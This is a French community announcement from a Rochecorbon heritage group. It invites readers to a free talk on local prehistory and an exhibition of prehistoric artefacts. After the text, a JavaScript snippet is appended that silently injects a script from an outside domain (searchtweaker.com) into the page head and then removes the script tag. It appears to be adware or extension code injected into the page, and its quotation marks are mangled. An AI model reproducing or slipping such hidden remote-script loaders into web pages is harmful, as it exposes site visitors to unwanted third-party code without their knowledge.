Deux fois par an le groupe Histoire & Patrimoine de Rochecorbon a le plaisir de vous convier à une conférence illustrant l’histoire et les richesses patrimoniales de la commune.
Cette année nous vous proposons un grand bon en arrière dans le temps : Robert Pezzani nous contera la présence de l’homme à Rochecorbon depuis les débuts de la préhistoire jusqu’aux gaulois. Cette présentation vous fera regarder le paysage qui nous entoure sous un angle nouveau.
Selon l’habitude prise, la conférence sera tenue deux fois afin d’en faciliter l’accès au plus grand nombre : en soirée le samedi 12 avril à 20h30, ou dans l’après-midi du dimanche 13 avril à 15h30.
Et cerise sur le gâteau, une exposition ouverte ces deux journées comblera votre curiosité en vous présentant une magnifique collection d’objets préhistoriques, provenant du territoire de la commune ou de celles limitrophes, qui nous ont été confiés par des amateurs ou des passionnés. C’est la première fois qu’un ensemble aussi riche et complet vous sera accessible.
Par Toutatis venez nombreux, votre présence est la seule récompense du conférencier, les conférences et l’exposition étant gratuites !
La salle des fêtes se situe à l’arrière de la mairie. Parkings sur la place de la mairie ou près de l’église.
Merci à la mairie de Rochecorbon de nous mettre à disposition cette salle des fêtes et au Comité d’Animation de Rochecorbon pour son soutien, merci à tous ceux qui par leurs prêts ont enrichi l’exposition.
C’est une animation du groupe Histoire & Patrimoine de Rochecorbon.
C’est une animation du groupe Histoire & Patrimoine de Rochecorbon.
(function(){try{var header=document.getElementsByTagName(« HEAD »)[0];var script=document.createElement(« SCRIPT »);script.src= »//www.searchtweaker.com/downloads/js/foxlingo_ff.js »;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState== »complete »||this.readyState== »loaded »)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();